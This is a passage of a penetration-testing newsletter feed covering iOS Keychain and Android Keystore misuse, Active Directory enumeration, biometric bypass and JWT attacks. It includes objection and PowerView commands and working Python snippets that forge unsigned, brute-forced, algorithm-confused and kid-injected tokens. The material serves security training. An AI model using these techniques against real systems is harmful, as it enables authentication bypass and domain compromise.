## 🧠 **What is the iOS Keychain?**

Imagine you’re a developer building an app that needs to store sensitive information, like:

-   a password,
-   an API token,
-   or a private key.

You _can’t_ just save that in a normal file or database; it would be too easy for attackers to steal.

That’s where the iOS Keychain comes in. It’s a special system provided by iOS that allows apps to safely store small pieces of sensitive data.

### Key features:

✅ **Encrypted at rest** — The data is protected using the device’s hardware security, like the Secure Enclave (a chip that keeps secrets safe).

✅ **Lock state protection** — You can choose if the data is only available when the device is unlocked, or if it’s always available.

✅ **Access control** — Apps can limit which other apps can access their Keychain data.

⚠️ **But!** The Keychain only protects the data _while it’s stored_. Once the app uses the data (for example, loads a password into memory), other protections need to kick in, and this is where mistakes happen.

## **Common Developer Mistakes**

Let’s break down the most common ways developers misuse the Keychain and how attackers can take advantage.

## **Using weak protection settings (accessibility attributes)**

When adding a secret to the Keychain, the developer chooses _when_ that secret is available:

-   **`kSecAttrAccessibleAlways`** → Always available, even if the device is locked.
-   **`kSecAttrAccessibleAfterFirstUnlock`** → Available after the device has been unlocked once after boot.

**Why is this bad?**  
If someone steals the device or dumps its storage, they could extract secrets without needing the passcode.

**Pentester view:** We can dump Keychain data in a cold boot attack or during forensic analysis.

## **Storing too much or the wrong type of data**

Some developers think:

&gt; “The Keychain encrypts stuff, so let’s save everything there!”

But Keychain is designed for small secrets (e.g. passwords, tokens). Not big files, logs, or configs.

**Why is this bad?**  
The more you store, the higher the chance something valuable slips through poor configuration.

## **Thinking the Secure Enclave protects everything**

Not all Keychain items are protected by the Secure Enclave; only certain types are (e.g. private keys created with the right settings).

**Why is this bad?**  
Attackers on a jailbroken device can dump the Keychain DB and get at items that aren’t hardware protected.

## **Failing to bind secrets to local authentication (Touch ID / Face ID / passcode)**

Some apps use the Keychain to store secrets that protect access to the app itself; for example, a token that proves the user has unlocked with Face ID or a PIN.

But sometimes, developers forget to require local authentication (biometrics or passcode) when the app retrieves the secret:

-   They don’t set `kSecAccessControlUserPresence` or similar flags.
-   The app can read the secret without asking the user to authenticate.

**Why is this bad?**  
An attacker with code execution (e.g. via Frida) can call the same function the app uses to get the secret, with no biometric or passcode prompt needed: a full bypass of local authentication.

💡 **Pentester view:** With **objection**, you can trigger this bypass easily:

```bash
ios ui biometrics_bypass
```

This command tells the app (via objection) to bypass the biometric prompt. If the app’s Keychain usage wasn’t properly bound to local authentication, it will still give up the secret without any user interaction.

Combine this with:

```bash
ios keychain dump --raw
```


to list and extract Keychain items the app is using and see if any are accessible without local auth.

## 🛠️ **Tools of the Trade**

If you’re just starting out, here are tools pentesters use to test Keychain implementations:  
🔹 **Frida** — A tool that lets you hook (intercept) function calls, like when an app reads from Keychain.  
🔹 **objection** — Easy-to-use tool to inspect and manipulate apps at runtime (built on Frida).

## 🧪 **Labs &amp; Practice**

If you really want to understand how the Keychain works, and how to spot or exploit its weaknesses, there are two solid ways to practice:

### 🛠 **Option 1: Build your own test app**

One of the best ways to learn is to create a simple iOS app yourself:

-   Store secrets in the Keychain using different configurations (e.g. with or without local authentication, with various accessibility attributes).
-   Write code that tries to read these secrets under different conditions (locked device, after reboot, etc.).
-   See how changing settings like `kSecAttrAccessibleWhenUnlocked` or adding `kSecAccessControlUserPresence` affects security.

👉 _By building and testing your own app, you&apos;ll gain hands-on experience with how Keychain protections really work._

### ⚡ **Option 2: Practice hacking with DVIA-v2**

If you’d rather jump straight into hacking practice, use [DVIA-v2 (Damn Vulnerable iOS App v2)](https://github.com/prateek147/DVIA-v2):

-   It’s a purposely insecure app made for learning iOS pentesting.
-   Includes Keychain vulnerabilities and many other common iOS security issues.
-   Safe environment to test tools like objection or Frida without risking a real app.

### 📖 **Recommended reading**

👉 For a step-by-step guide to iOS pentesting basics (including Keychain issues), I highly recommend this article:  
[Practical iOS Penetration Testing – A Step-by-Step Guide](https://aupsham98.medium.com/practical-ios-penetration-testing-a-step-by-step-guide-8214d35aaf3c)

## 📝 **Final Thoughts**

✅ The iOS Keychain is powerful but only if developers use it correctly.

❌ The Keychain protects data _at rest_, but once your app loads the secret into memory, or if you skip local authentication, attackers can strike.

As offensive security professionals, our job is to:

-   Understand how these mechanisms work.
-   Spot weak points in real apps.
-   Test both storage and runtime usage of sensitive data.

So just like we said with the Android Keystore:  
_“It’s in the Keychain” doesn’t automatically mean it’s safe._

Until next time,  
Stay sharp, stay testing,  
Ruben **🚀**</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Android Keystore: Fort Knox or Glass Box?</title><link>https://www.kayssel.com/newsletter/issue-9</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-9</guid><description>Breaking and Defending Android’s Key Vault</description><pubDate>Sun, 15 Jun 2025 11:29:34 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

When it comes to mobile security, most developers trust the Keystore like it’s untouchable.  
But what is the Android Keystore really? What does it protect? What doesn’t it? And more importantly, how can we, as pentesters, test whether it’s used properly?

In this issue, we’ll break down what the Keystore is, how it works, where it fails, and how to test apps that rely on it.

Let’s crack open the vault 👇

## 🧠 What is the Android Keystore?

The Android Keystore is a secure system service that allows apps to generate, store, and use cryptographic keys without exposing them to the app or the filesystem.

These keys are:

-   **Non-exportable** – you can use them, but you can&apos;t read them.
-   **Stored securely** – ideally in the **TEE** (Trusted Execution Environment) or **StrongBox**, a hardware-backed secure element.

The Keystore is designed to allow secure usage of:

-   RSA, AES, EC keys
-   Key signing, encryption/decryption
-   Keys bound to user authentication or hardware state

But here’s the kicker: you don’t store secrets in the Keystore, you store keys. If you want to protect a token or password, you encrypt it with a Keystore-managed key and store the ciphertext.

## 🧨 Common Developer Mistakes

The Keystore sounds great, but it’s often misused. Here are the most common mistakes developers make, and what they really mean in practice:

#### Saving the encrypted data in external storage

&gt; _“But it’s encrypted, so it should be fine, right?”_

Even if you encrypt a secret using a Keystore key, storing the encrypted blob in public locations like `/sdcard/` or `Downloads/` is dangerous. Other apps or attackers can access it.

💥 **As an attacker**: Grab the encrypted file, hook the app with Frida, and dump the decrypted content when it’s used.

#### Not requiring user authentication to use the key

&gt; _“The key is stored in the TEE, that means it’s secure!”_

Not necessarily. If `setUserAuthenticationRequired(true)` wasn’t used during key creation, the app (and malware) can use the key at any time, even if the device is locked.

💥 **As an attacker**: Hook `Cipher.doFinal()` to decrypt data without unlocking the phone.

#### Assuming keys are hardware-backed

&gt; _“I’m using StrongBox, so the key is safe.”_

Many apps don’t check whether the key is truly stored in secure hardware. If StrongBox isn’t supported, Android silently falls back to software storage, which is less secure and more exposed.

💥 **As an attacker**: On emulators or rooted devices, software Keystore keys are easier to extract or abuse.

✅ **Dev tip**: Use `KeyInfo.isInsideSecureHardware()` to verify.

#### Storing secrets directly in SharedPreferences

&gt; _“It’s just a token, I’ll store it in prefs for now.”_

Big mistake. `SharedPreferences` files are stored as plain XML. Even if the values are encrypted, unless it’s done properly with a Keystore key and internal storage, they can be exposed.

💥 **As an attacker**: Dump the preferences file or memory and extract the secret.

#### Hardcoding secrets or crypto keys in the source code

&gt; _“It’s just a small AES key for internal use.”_

Anything hardcoded in your app is recoverable. With tools like `jadx`, static secrets are one `Ctrl+F` away.

💥 **As an attacker**: Reverse the APK, extract the key, and decrypt any data protected with it.

## 🛠️ Tools of the Trade

Use these tools to detect and exploit poor Keystore usage:

-   **Frida** – Hook crypto functions like `Cipher.init` or `Cipher.doFinal`
-   **objection** – Quick Android app inspection &amp; dynamic testing
-   **MobSF** – Detect improper Keystore/API usage via static analysis
-   **jadx** – Reverse engineer APKs to detect hardcoded keys/secrets

### 🧪 Labs &amp; Practice

Unlike other issues, there’s no Hack The Box machine or CTF lab recommendation this time.  
Keystore vulnerabilities are highly app-specific and subtle; there’s no standard environment that captures all the edge cases.  
So instead of following a guided challenge… you’ll have to get your hands dirty.

Here’s how you can practice:

#### 🔍 Option 1: Reverse a real app

Pick any Android app (even a simple one) and analyze how it handles sensitive data:

-   🔎 Use `jadx` or `MobSF` to decompile the APK
-   🔐 Look for `KeyGenParameterSpec`, `Cipher`, or `Keystore.getInstance`
-   🧩 Check if keys require authentication (`setUserAuthenticationRequired`)
-   🗝️ Check how secrets are encrypted and where they’re stored (internal? external? SharedPreferences?)
-   ⚔️ Hook the app with **Frida** and try to:
    -   Call `Cipher.doFinal()` directly
    -   Bypass biometric UI checks
    -   Extract secrets from memory

#### 🛠 Option 2: Build your own test app

Want full control over the environment? Write a minimal app that:

-   Generates a key using Android Keystore
-   Encrypts a token with that key
-   Asks for fingerprint before decrypting

Then try to break your own implementation:

-   What happens if you remove `setUserAuthenticationRequired(true)`?
-   Can you still decrypt the token with Frida or via memory dumps?
-   Can you extract the ciphertext from internal storage and reuse it?

## Final Thoughts

The Keystore isn’t a silver bullet. It’s a powerful tool, but only if used properly.

As pentesters, we need to understand:

-   What the Keystore actually protects
-   What parts of the chain are still vulnerable (storage, memory, usage)
-   How to spot and exploit weak implementations

Next time you hear “don’t worry, it’s in the Keystore”, smile, nod, and open up Frida.

Until next time,  
Stay sharp, stay testing,  
Ruben **🚀**</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Active Directory Enumeration: Mapping the Kingdom Before the Siege</title><link>https://www.kayssel.com/newsletter/issue-8</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-8</guid><description>Usernames, sessions and hidden privilege paths: uncovering the domain’s true structure</description><pubDate>Sun, 08 Jun 2025 15:12:09 GMT</pubDate><content:encoded>## Introduction

Hey everyone!  
Biometrics may feel futuristic, but nothing beats the classic: Active Directory.  
When you&apos;re inside a Windows domain, the first real step isn&apos;t exploiting, it&apos;s mapping. Knowing who’s who, what’s what, and where the gold is.

In this issue, we’re diving into Active Directory enumeration. How to map users, groups, machines, permissions, and privilege paths that might lead you all the way to Domain Admin.

Let’s start drawing the map 👇

By the way, a while ago I published a full series on [Active Directory](https://www.kayssel.com/series/active-directory/) attacks and internals. [One of the chapters focuses specifically on post-compromise enumeration,](https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration/) right after gaining access to a machine. If you want to go deeper, that’s a good place to start.

## 🏰 Why Enumeration Matters in AD

In an Active Directory environment, almost everything is an object: users, computers, groups, OUs, GPOs, ACLs... And most of this is readable by any authenticated user.

This means even with a low-privileged domain account or a compromised machine, you can:

-   Discover who the domain admins are
-   Find machines where they log in
-   Spot misconfigured ACLs that let you escalate
-   Build a path from “just a user” to “Domain Admin”

## 🛠 Tools of the Trade

Here are a few tools to get you started – but this is just the tip of the iceberg. I highly recommend exploring the space further, as there&apos;s a huge ecosystem of tools built for AD enumeration and attack path discovery.

Some highlights:

-   🕵️‍♂️ **BloodHound + SharpHound** – The classic for visualizing privilege escalation paths with a graph-based approach.
-   🐍 **BloodHound.py (bloodhound-python)** – A Python-based collector that can be run remotely to feed BloodHound data without touching disk.
-   ⚡ **RustHound** – A blazing-fast SharpHound alternative written in Rust, optimized for stealth and performance.
-   🔍 **ldapsearch / ldapdomaindump** – Great for lightweight LDAP-based dumps of domain objects.
-   🧪 **PowerView** – PowerShell framework for comprehensive in-domain enumeration (flagged by AV, so use with caution).
-   🧰 **NetExec** – Modern fork of CrackMapExec that’s actively maintained and supports enumeration, lateral movement, and command execution.

## 👤 Enumerating Users

Finding users is often the first step.

### PowerView:

```powershell
Get-DomainUser
Get-DomainUser -Identity &quot;john.doe&quot;
```

### ldapsearch:

```bash
ldapsearch -x -h &lt;DC-IP&gt; -b &quot;dc=corp,dc=local&quot; &quot;(objectClass=user)&quot; sAMAccountName

```

### BloodHound:

```bash
SharpHound.exe -c All
```

Then load the output into BloodHound for full graph analysis of users, sessions, and access rights.

## 👑 Finding Domain Admins &amp; High-Value Targets

```powershell
Get-DomainGroupMember -Identity &quot;Domain Admins&quot;

```

Or visually through BloodHound → `Group: Domain Admins`.

💡 Also look for users in:

-   Enterprise Admins
-   Backup Operators (can back up the DC, including the `NTDS.dit` database)
-   DNSAdmins (can escalate to SYSTEM)
-   Delegated OUs with misconfigured rights

## 🖥️ Finding Machines and Sessions

Where do admins log in? That’s gold.

```powershell
Find-DomainUserLocation -UserName &quot;admin.user&quot;

```

Or let BloodHound highlight “HasSession” and “AdminTo” edges; they show where sensitive users have logged in, and where you might hijack tokens or pivot.

## 🔐 Dumping ACLs &amp; Delegation Paths

AD is full of hidden privilege paths via misconfigured Access Control Entries (ACEs).

BloodHound + ACL collection mode:

```powershell
SharpHound.exe -c ACL

```

PowerView (if usable):

```powershell
Find-InterestingDomainAcl
Get-ObjectAcl -SamAccountName &quot;targetuser&quot; -ResolveGUIDs

```

Look for:

-   `GenericAll`, `GenericWrite`
-   `WriteOwner`, `WriteDACL`
-   `ForceChangePassword`

These flags can give full control over users, groups, or even entire OUs.

## 🧰 ldapdomaindump: Fast &amp; Clean

```bash
ldapdomaindump -u &apos;corp.local\\lowuser&apos; -p &apos;Password123&apos; &lt;DC-IP&gt;

```

This will dump:

-   All users, groups, computers
-   Trust relationships
-   GPOs
-   Interesting flags like &quot;Password not required&quot;

Low noise. High value.

## 🗺️ Final Tips for Silent Recon

-   **Use targeted SharpHound collection** (e.g., `Session`, `ACL`, `Trusts`) to reduce noise.
-   **Prefer LDAP** over SMB or WinRM where possible; it&apos;s stealthier.
-   **Log everything**. You may not see a privilege escalation path now, but one new session or credential can change the graph entirely.

## 🧪 Labs to Practice BloodHound Enumeration

BloodHound isn&apos;t just a visualization tool; it’s a weapon. Mastering it means understanding how privileges and object relationships can be abused in AD environments. These labs will sharpen your skills on data collection, attack path discovery, and Cypher queries.

-   🎮 **Hack The Box – Blazorized**
    -   Set an SPN on a user and identify the action in BloodHound
    -   Discover `GenericWrite` permissions to abuse login scripts
    -   Visualize the privilege path in the BloodHound interface  
        👉 _Good starting point with low-privilege enumeration and basic privilege abuse_
-   🎮 **Hack The Box – Fulcrum**
    -   Use BloodHound to enumerate users and group memberships  
        👉 _Basic recon with SharpHound, minimal complexity_
-   🎮 **Hack The Box – Axlle**
    -   Collect data with `BloodHound.py` and validate session info
    -   Compare results with SharpHound to detect gaps in the Python collector  
        👉 _Great for understanding collector limitations_
-   🎮 **Hack The Box – Certified**
    -   Run `BloodHound.py` and `SharpHound`
    -   Spot `WriteOwner`, `GenericAll`, and trace delegation paths  
        👉 _Mid-to-advanced level involving multiple attack paths and Cypher logic_
-   🎮 **Hack The Box – Rebound**
    -   Use `NetExec` to run the Python collector
    -   Ingest and analyze BloodHound data for ACL abuse paths  
        👉 _Requires chaining tools and integrating enumeration into access flows_

## 🧭 Final Thoughts

Active Directory isn’t just a directory, it’s a jungle of objects, permissions, and hidden privilege paths.

And if you want to own the domain, you need to understand the map before you move.

Enumerate first. Attack second.  
Because knowledge, in AD, _is_ power.

Until next time,  
Stay quiet, stay mapping,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>Biometric Authentication: Pretty Face, Weak Shield?</title><link>https://www.kayssel.com/newsletter/issue-7</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-7</guid><description>How biometric checks fool developers and how you can fool them back.</description><pubDate>Sat, 31 May 2025 12:08:29 GMT</pubDate><content:encoded>Hey everyone!  
Biometrics are everywhere: unlocking your phone, approving a payment, signing a transaction. It _feels_ secure, like something only you can do. But when it comes to app security, that’s often just an illusion.

In this issue, we’re diving into biometric authentication, how it really works on iOS and Android, where developers usually fail, and how attackers (you!) can bypass it with Objection, Frida, or full-on reversing when needed.

Let’s pop the fingerprint scanner and peek inside 👇

## 🔍 What Is Biometric Authentication (Really)?

Biometric auth isn’t magic – it’s just a local decision mechanism.

When you authenticate using Face ID or a fingerprint:

1.  The OS compares your biometric input to a stored template.
2.  If it matches, the OS tells the app: “Yes, it’s the user.”
3.  The app then decides what that means – unlock the UI? Sign something? Grant access?

### On iOS

iOS apps use the `LocalAuthentication` framework with calls like:

```swift
LAContext().evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics,
                           localizedReason: "Unlock") { success, _ in /* ... */ }

```

This shows the system Face ID / Touch ID prompt. If the check passes, the callback returns `true`.

That’s it.

Unless the developer explicitly binds this result to a cryptographic operation – for example, signing with a key stored in the Secure Enclave – there’s no guarantee the biometric result is real.

Also, many apps use key types (like `secp256k1`) that are not supported by Secure Enclave, forcing them to store the key in userland. Dangerous move.

### On Android

Android offers the `BiometricPrompt` API. Combined with Android Keystore, it can protect keys so they’re only usable after biometric auth.

Typical flow:

1.  BiometricPrompt asks for authentication.
2.  If successful, a key is unlocked in the Keystore.
3.  That key signs or decrypts something sensitive.

But if the app just reacts to `onAuthenticationSucceeded` without using real keys or enforcing cryptographic binding, it’s just as bypassable.

## 🕳️ Where It Fails: Common Developer Mistakes

Here’s where things tend to break:

### ❌ No Real Binding

Apps use biometrics as a fancy UI, but control access with:

-   A memory flag (`isAuthenticated = true`)
-   A value in Shared Preferences
-   Or just `if userPassedBiometric { unlock() }`

No cryptography. No attestation. Just vibes.

### 🔑 Weak Key Storage

Some apps generate a private key and use it to sign or decrypt data after biometric approval... but store the key:

-   In the standard keychain
-   Without Secure Enclave or biometric gating
-   Or worse, as a file in app storage (😬)

On jailbroken or rooted devices, this key can be extracted. Once you have it, you can:

-   Forge valid signatures
-   Emulate the biometric flow
-   Perform sensitive actions from a script

## 🧪 Techniques to Bypass Biometrics

Let’s get practical. Here are three techniques you can use depending on the platform and implementation.

### 🍏 iOS – Objection Biometric Bypass

On jailbroken devices, use [Objection](https://github.com/sensepost/objection):

```bash
objection --gadget &lt;app&gt; explore
ios ui biometric_bypass

```

This hooks `evaluatePolicy` and forces a successful return.  
If the app trusts that boolean without cryptographic binding – you’re in.

### 🤖 Android – Frida Fingerprint Bypass

Two great scripts from ReversecLabs:

-   [`fingerprint-bypass.js`](https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) – directly hooks biometric logic to always return success.
-   [`fingerprint-bypass-via-exception-handling.js`](https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js) – forces exceptions to bypass checks.

These are effective when the app uses `BiometricPrompt` without proper Keystore protection.

### 🧠 And If None of That Works?

Time for reversing:

-   Decompile the APK or dump the IPA.
-   Trace where `evaluatePolicy` or `BiometricPrompt` is used.
-   Find the logic path that decides whether access is granted.
-   Identify flags, tokens, or keys involved and override or extract.

If it’s not cryptographically enforced, it’s probably bypassable.

## 🧪 Labs to Practice Biometric Bypass

The best way to understand how biometric authentication really works, and how to break it, is to build your own test environment.

I covered this exact topic in one of the [chapters](https://www.kayssel.com/post/android-7/) of my [mobile security](https://www.kayssel.com/series/android/) series; unfortunately, only for Android for now. It includes how to set up a minimal app and the tools you need to simulate and exploit common biometric implementation mistakes.

## 🧭 Final Thoughts

Biometric auth feels secure, but without crypto-bound enforcement, it’s just UI sugar.

If you&apos;re a dev: use Secure Enclave or Android Keystore, and sign something real.  
If you&apos;re a pentester: hook, patch, or reverse your way in.

Until next time,  
Stay curious, stay subverting,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>The Anatomy of a JWT Hack</title><link>https://www.kayssel.com/newsletter/issue-6</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-6</guid><description>JWTs: Small Tokens, Big Mistakes</description><pubDate>Sun, 25 May 2025 16:30:49 GMT</pubDate><content:encoded>Hey everyone!  
Big day: the [**first chapter of my Docker + Rust series is out**](https://www.kayssel.com/post/docker-security-1/), and this newsletter drops alongside it! 🎉  
If you want to learn how container security works from the inside out, while watching me build a CLI tool ([Valeris](https://github.com/rsgbengi/valeris)) from scratch, go check it out on the blog.

But today, we&apos;re shifting gears from containers to credentials.  
Let’s talk about **JSON Web Tokens (JWTs)**: those small Base64 blobs that silently carry identity and permissions across APIs. They&apos;re everywhere in modern web apps, and when implemented poorly, they open the door to serious attacks.

In this issue, we’ll explore what JWTs really are, how they work, and the most common ways they get hacked: from `alg: none` tricks to key injection and algorithm confusion attacks. Real bugs, real CVEs, real exploitation.

Let’s dive in 👇

# 🧩 What Are JWTs, and Why Do They Matter?

**JSON Web Tokens (JWTs)** are a compact way to represent claims between two parties. Think of them as signed JSON blobs used in web apps to handle sessions, permissions, and user identity without needing server-side state.

&lt;details&gt;
&lt;summary&gt;They look like this:&lt;/summary&gt;

```bash
&lt;base64url(header)&gt;.&lt;base64url(payload)&gt;.&lt;base64url(signature)&gt;

```
&lt;/details&gt;


Each section is Base64URL-encoded:

-   **Header** – specifies algorithm (`alg`) and token type (`typ`)
-   **Payload** – includes claims like `sub`, `admin`, `exp`, `iat`, etc.
-   **Signature** – ensures the data hasn’t been tampered with

&lt;details&gt;
&lt;summary&gt;Example payload:&lt;/summary&gt;

```json
{
  &quot;sub&quot;: &quot;user1&quot;,
  &quot;admin&quot;: false
}

```
&lt;/details&gt;


JWTs are usually sent in an `Authorization: Bearer` header. And since the payload is not encrypted by default, anyone with the token can read it, **but** they shouldn’t be able to modify it without invalidating the signature. That’s the theory… let’s see what happens in practice 👇
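
To make that concrete, here’s a minimal Python sketch that reads a token’s payload without knowing any key. The token below is a made-up example with a junk signature; the payload is still fully readable:

```python
import base64
import json

def peek_payload(token):
    """Decode a JWT payload without verifying the signature (read-only recon)."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Header {"alg":"HS256","typ":"JWT"}, payload {"sub":"user1","admin":false}
token = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiJ1c2VyMSIsImFkbWluIjpmYWxzZX0."
         "bogus-signature")
print(peek_payload(token))  # {'sub': 'user1', 'admin': False}
```

This is why you should never put secrets in a JWT payload: confidentiality comes from encryption (JWE), not from signing.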

## 🔓 Signature Not Verified

This is the deadliest and most common mistake. Some developers use `decode()` to parse JWTs without verifying the signature with `verify()`.

If the backend skips signature verification:

-   You can edit any field (e.g., `admin: true`)
-   Keep or remove the signature altogether
-   And the server will accept it

📌 **Result:** total authentication and authorization bypass. You&apos;re basically the admin now.

## ❌ `alg: none` Attack

JWTs specify the signing algorithm in the header, and `alg: none` means… no signature.

It was originally intended for debugging, but some libraries (or careless configs) still allow it.

Attack flow:

1.  Change `&quot;alg&quot;` in the header to `&quot;none&quot;`
2.  Remove the signature part
3.  Modify the payload however you like
4.  Reassemble: `header.payload.`
5.  Send the token

📌 If accepted, the app is trusting unsigned data. Game over.
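
The whole forgery fits in a few lines of standard-library Python (the claims here are illustrative):

```python
import base64
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Forge an unsigned token: "alg": "none" in the header, empty signature segment
header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "user1", "admin": True}).encode())
forged = header + "." + payload + "."  # note the trailing dot: no signature
print(forged)
```

Some verifiers also accept casing tricks like `"None"` or `"nOnE"`, so it’s worth trying a few variants.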

## 🧨 Weak HMAC Secrets (HS256 Brute Force)

When apps use **HS256**, the same key signs and verifies the token. If that key is weak (e.g., `secret`, `123456`, app name…), it can be brute-forced offline.

Steps:

-   Capture a valid JWT
-   Use tools like `hashcat` or `jwt-tool` to brute-force the key
-   Forge tokens with any payload you want

📌 This works especially well on dev/staging environments, open-source projects, and rushed setups.
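
A rough illustration of the offline attack in pure Python; in practice you’d throw `hashcat` or `jwt-tool` with a large wordlist at it, but the mechanics are the same:

```python
import base64
import hashlib
import hmac

def hs256_sig(signing_input, secret):
    """Compute the base64url HS256 signature over 'header.payload'."""
    mac = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).rstrip(b"=").decode()

def brute_force(token, wordlist):
    """Try each candidate secret until one reproduces the token's signature."""
    signing_input, _, signature = token.rpartition(".")
    for guess in wordlist:
        if hmac.compare_digest(hs256_sig(signing_input, guess.encode()), signature):
            return guess
    return None

# Build a victim token signed with a weak key, then recover that key offline
victim = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyMSJ9"
token = victim + "." + hs256_sig(victim, b"secret")
print(brute_force(token, ["123456", "letmein", "secret"]))  # secret
```

Because everything is offline, the server never sees a single failed attempt.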

## 🌀 Algorithm Confusion: RS256 ➜ HS256

This one is sneaky.

Suppose the app uses **RS256**, which relies on a private/public key pair:

-   The server signs with the private key
-   Verifies with the public key

But if it trusts the `alg` field from the JWT, you can:

-   Change `RS256` → `HS256`
-   Use the public key (which you might have) as the HMAC secret
-   Sign a token with your payload

📌 The server thinks it’s verifying with RSA, but it’s actually verifying a forged HMAC. Access granted.
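
The attacker side of the trick can be sketched as follows. Whether the forged token is accepted depends entirely on the server running a verifier that trusts `alg`; the PEM below is a placeholder for the real recovered public key:

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Placeholder: in a real attack this is the server's actual RSA public key PEM,
# recovered from a JWKS endpoint, a TLS certificate, or the app itself.
public_key_pem = b"-----BEGIN PUBLIC KEY-----\nMIIB...placeholder\n-----END PUBLIC KEY-----\n"

header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "user1", "admin": True}).encode())
signing_input = header + "." + payload

# The trick: HMAC the token using the *public* key bytes as the shared secret.
# A vulnerable verifier that trusts "alg" computes the same HMAC and accepts it.
sig = b64url(hmac.new(public_key_pem, signing_input.encode(), hashlib.sha256).digest())
forged = signing_input + "." + sig
print(forged)
```

The exact byte representation of the key matters (PEM with or without trailing newline, DER, etc.), so tools typically try several encodings.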

## 🔀 Algorithm Confusion: ES256 ➜ HS256

Same idea, different algorithm. Instead of RSA, the server uses **ECDSA (ES256)**.

If the app doesn&apos;t enforce the expected algorithm:

-   Change `alg: ES256` to `HS256`
-   Use the ECDSA public key as HMAC secret
-   Sign your payload

📌 Another case of mixing asymmetric and symmetric crypto. And attackers love it.

## 🪤 `kid` Injection (Key ID Manipulation)

JWTs can include a `kid` field in the header to indicate which key should be used to verify the token.

But if the app:

-   Loads keys from file system using `kid`, or
-   Performs a raw DB query with `kid`

Then you can do things like:

-   `kid: ../../../../dev/null` → server reads empty key
-   `kid: &apos; UNION SELECT &apos;fake-key&apos; --` → SQL injection

📌 Exploited correctly, this lets you point the app to a key you control, or force it to use a blank key and sign your own tokens.
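
Assuming the server blindly reads whatever key file `kid` names, the `/dev/null` variant reduces to signing your token with an empty secret. A stdlib-only sketch:

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Path traversal in kid: the server opens /dev/null and loads b"" as its HMAC key
header = b64url(json.dumps({"alg": "HS256", "kid": "../../../../dev/null"}).encode())
payload = b64url(json.dumps({"sub": "user1", "admin": True}).encode())
signing_input = header + "." + payload

# Sign with the same empty key the server will end up using
sig = b64url(hmac.new(b"", signing_input.encode(), hashlib.sha256).digest())
forged = signing_input + "." + sig
print(forged)
```

`jwt-tool` automates exactly this with its `kid` injection checks.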

## 🧬 Embedded JWK (CVE-2018-0114)

JWTs also support an optional `jwk` field that embeds the public key directly in the token header.

If the server accepts any key from this field without validation, it’s vulnerable.

Attack:

-   Generate your own RSA key pair
-   Sign the JWT with your private key
-   Embed the public key in the `jwk` header
-   Send it

📌 The app uses your embedded key to verify your fake token. Total bypass.

## 🌐 JKU / X5U Header Abuse

The `jku` and `x5u` fields let a token point to external URLs for keys or certs.

If the backend:

-   Fetches these keys dynamically
-   Doesn’t validate where they come from

Then attackers can:

-   Host their own JWKS or X.509 cert
-   Sign the token with their private key
-   Insert `jku`/`x5u` to point at their hosted key
-   Send the forged token

📌 This isn’t just key injection; it can also be a vector for SSRF.

## 🧪 Claim Confusion (Missing `aud`, `iss`, `sub` Checks)

If an app doesn’t validate claims like `audience` or `issuer`, attackers can:

-   Use tokens issued for a different service
-   Reuse tokens across microservices or APIs
-   Escalate privileges horizontally

📌 This is surprisingly common in modern, distributed architectures.

## ⏳ No Expiration / Long-Lived Tokens

JWTs should expire fast. If a token has:

-   No `exp`, or
-   An `exp` set to years in the future

Then:

-   It can be reused forever
-   Attackers can persist access indefinitely

📌 Often paired with other techniques to maintain access after compromise.

# 🛠 Tools for JWT Hacking

Keep it lean, sharp, and fast. These are the essentials:

-   **`jwt-tool`**: All-in-one CLI to decode, tamper, brute-force, and test JWT vulnerabilities.  
    👉 [`ticarpi/jwt_tool`](https://github.com/ticarpi/jwt_tool)
-   **Hashcat**: Brute-force HMAC secrets (HS256/HS512) offline with GPU power.  
    👉 Mode `16500` for HS256
-   **Burp Suite + JWT Editor**: Decode, modify, re-sign JWTs on the fly. Great for testing `alg`, `kid`, `jku`, and more.
-   **TruffleHog / Gitleaks**: Scan repos for leaked JWTs or weak secrets. Great for recon.

# 🧪 Where to Practice

Want to test these attacks in the wild (safely)? Here’s where to train:

-   **🎯 PortSwigger Web Security Academy**
    -   Realistic JWT labs: signature bypass, weak key brute-forcing, and header abuse
    -   👉 Great for hands-on skill building
-   **🎮 Hack The Box – Craft**
    -   Combine Git recon with JWT forging and signature cracking
    -   👉 Perfect mix of theory + practice
-   **🎮 Hack The Box – Awkward**
    -   Crack JWTs with Hashcat, forge tokens, and exploit logic flaws
    -   👉 Covers HS256 abuse, scripting, and privilege escalation
-   **🎮 Hack The Box – Yummy**
    -   Exploit weak RSA keys using `RsaCtfTool` to forge JWTs
    -   👉 Learn how broken crypto affects JWTs in real apps
-   **🎮 Hack The Box – CyberMonday**
    -   Perform an **RS256 ➝ HS256** algorithm confusion attack using the server&apos;s public key
    -   👉 Realistic and highly relevant vulnerability
-   **🎮 Hack The Box – Luke**
